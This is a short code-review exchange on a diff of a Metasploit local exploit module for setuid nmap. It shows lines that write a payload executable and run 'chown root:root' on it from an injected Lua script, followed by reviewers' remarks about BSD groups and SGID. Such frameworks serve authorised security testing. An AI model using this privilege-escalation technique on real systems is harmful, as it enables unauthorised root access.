modules/exploits/unix/local/setuid_nmap.rb

```diff
@@ -69,16 +68,16 @@ def exploit
       write_file(exe_file, generate_payload_exe)
       evil_lua = %Q{
         os.execute("chown root:root #{exe_file}");
```

Comment:
Note to self: check these commands, especially with `PrependSetresuid`.

Reply:
Group might be `wheel` on BSD, and the lack of `PrependSetre*gid` makes me think SGID is optimistic but not necessary. Leaving it as is.